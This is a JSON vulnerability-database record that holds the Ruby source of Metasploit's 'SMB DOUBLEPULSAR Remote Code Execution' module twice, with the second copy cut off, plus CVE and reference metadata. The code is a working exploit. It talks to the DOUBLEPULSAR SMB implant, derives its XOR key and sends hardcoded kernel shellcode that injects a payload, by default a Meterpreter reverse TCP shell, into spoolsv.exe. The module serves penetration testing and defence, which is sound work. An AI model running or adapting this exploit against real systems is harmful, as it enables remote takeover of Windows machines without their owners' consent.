["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/smb_doublepulsar_rce.rb", "title": "SMB DOUBLEPULSAR Remote Code Execution", "type": "metasploit", "viewCount": 61}, "differentElements": ["sourceData"], "edition": 22, "lastseen": "2020-03-28T22:11:20"}], "viewCount": 1079, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-10-03T19:20:37", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2020-10-03T19:20:37", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/smb_doublepulsar_rce.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n deregister_options('SMB::ProtocolVersion')\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n 